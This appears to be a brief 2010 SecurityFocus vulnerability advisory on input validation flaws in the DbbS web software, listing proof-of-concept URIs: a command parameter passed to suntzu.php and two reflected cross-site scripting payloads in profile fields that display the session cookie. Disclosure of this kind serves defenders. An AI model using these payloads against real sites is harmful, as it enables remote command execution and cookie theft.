DbbS Multiple Input Validation Vulnerabilities


These issues can be exploited through a web client.

The following proof-of-concept URIs are available:

http://www.site.com/DbbS/suntzu.php?cmd=dir

http://www.site.com/DbbS/profile.php?mode=edit&myid=1&ulocation="><script>alert(document.cookie)</script>

http://www.site.com/DbbS/profile.php?mode=edit&myid=1&uhobbies="><script>alert(document.cookie)</script>


 

Copyright 2010, SecurityFocus